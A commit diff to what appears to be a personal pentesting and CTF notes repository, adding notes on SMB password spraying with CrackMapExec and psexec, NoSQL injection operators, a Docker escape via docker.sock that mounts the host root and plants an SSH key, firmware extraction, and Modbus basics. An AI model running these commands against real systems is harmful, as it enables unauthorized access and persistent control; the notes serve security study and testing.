bump

.gitmodules

@@ -52,3 +52,6 @@
 [submodule "exploit/windows/CVE-2021-1675"]
 	path = exploit/windows/CVE-2021-1675
 	url = https://github.com/calebstewart/CVE-2021-1675
+[submodule "enumeration/priv_esc/deepce"]
+	path = enumeration/priv_esc/deepce
+	url = https://github.com/stealthcopter/deepce.git

crackmapexec.md

@@ -0,0 +1,10 @@
+# Crackmapexec
+
+* Dictionary attack against SMB
+```sh 
+cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
+```
+    * Use the password with `impacket/examples/psexec.py` in the following way
+    ```sh
+     psexec.py domain.name/<user>:<password>@<target-IP>
+     ```

enumeration/enumeration

@@ -1 +0,0 @@
-Subproject commit 3c0e726604c9dc2590a699c89aabeaa0acf9f94d

enumeration/priv_esc/deepce

@@ -0,0 +1 @@
+Subproject commit 229fad09eee712ede052525d4d3df29410bc0199

exploit/sqli/no_sqli.md

@@ -0,0 +1,15 @@
+# NoSQL Injections
+
+* No tables, but files (collections)
+* Examples are Elasticsearch, MongoDB, Redis, CouchDB.
+
+## Querying
+* Filter instead of SQL queries
+* [Redis docs](https://redis.io/documentation)
+* [MongoDB operators](https://docs.mongodb.com/manual/reference/operator/query/)
+* [Elasticsearch docs](https://www.elastic.co/guide/index.html)
+
+## Tips & Tricks
+
+* Pass HTTP parameter as an array instead of `user=` and `password=` use `user[$operator]=foo` and `password[$operator]=bar`
+    * 2D array via `user[$nin][]=foo`

misc/level3_hypervisor/docker_sec/docker.md

@@ -96,6 +96,35 @@ echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
 chmod a+x /exploit
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 ```
+## Check fdisk
+
+* `fdisk -l` and `lsblk`, host bulk device may be exposed
+* Mount the device
+```sh
+mkdir /mnt/hostdev
+mount /dev/<hostVda> /mnt/hostdev
+```
+
+## Creating a Container from inside another container
+
+* Needs root inside a container
+* Upload [static curl](https://github.com/moparisthebest/static-curl)
+* Check available images and containers
+```sh
+curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/containers/json
+curl-amd64 --unix-socket /run/docker.sock http://127.0.0.1/images/json
+```
+* Inside the container as root
+```sh
+curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.sock http://localhost/containers/create -d '{"Detach":true,"AttachStdin":false,"AttachStdout":true,"AttachStderr":true,"Tty":false,"Image":"<imagename>:latest","HostConfig":{"Binds": ["/:/var/tmp"]},"Cmd":["sh", "-c", "echo <ssh-key> >> /var/tmp/root/.ssh/authorized_keys"]}'
+```
+* Return value is the ID
+* Start a container
+```sh
+curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
+```
+* Login in to the host via ssh
+
 ## Dirty c0w
 https://github.com/dirtycow/dirtycow.github.io
 

reverse_engineering/docs/firmware.md

@@ -9,3 +9,27 @@
     ```sh
     ./fat.py <firmware>
     ```
+* [Jefferson](https://github.com/sviehb/jefferson) or AUR package `jefferson-git`
+
+## Usage
+* Check image via `strings`
+* Check CRC via `cksum -a crc <image>`
+* Use `binwalk` to extract. There are to methods
+    * `-e` extract by offset
+    * `--dd=".*"` by file extension
+
+### Mount JFFS2 File
+* Use kernel where `CONFIG_MTD_RAM` is set. Using Arch this is any kernel before `5.10`
+```sh
+rm -rf /dev/mtdblock0
+mknod /dev/mtdblock0 b 31 0
+mkdir /mnt/jffs2
+modprobe jffs2
+modprobe mtdram
+modprobe mtdblock
+dd if=<jffs2File> of=/dev/mtdblock0
+mount -t jffs2 /dev/mtdblock0 /mnt/jffs2/
+```
+
+## Tips & Tricks
+* Watch out for `HNAP` and `JNAP` as [an attack vector](https://routersecurity.org/hnap.php)

reverse_engineering/docs/scada.md

@@ -0,0 +1,35 @@
+# Supervisory Control and Data Acquisition (SCADA)
+
+* SCADA works as an aggregatio of the following systems
+    * __Programmable Logic Controllers (PLC)__, monitoring sensors and controlling devices.
+    * __Remote Terminal Unit (RTU)__, use for wide area telemetry
+    * __Human Machine Interface (HMI)__, supervisory through an operator. Interaction through human user input.
+    * __Communication network__ 
+
+* Security is no first class citizen
+
+## Modbus
+
+* Developed by Modicon
+* Master/Slave, latter has an 8 bit address.
+* RS-485 Connector
+* Data registers 16 bit
+    * Input register, 16 bit ro 
+    * Hold register, rw
+    * Coil register, 1 bit rw
+    * Discrete register, 1bit ro  
+
+### Function Codes
+* [Modbus101](https://www.csimn.com/CSI_pages/Modbus101.html)
+* RTU request inside of TCP segments, port 502
+
+* 1	__Read Coil__
+* 2	__Read Discrete Input__
+* 3	__Read Holding Registers__
+* 4	__Read Input Registers__
+* 5	__Write Single Coil__
+* 6	__Write Single Holding Register__
+* 15 __Write Multiple Coils__
+* 16 __Write Multiple Holding Registers__
+
+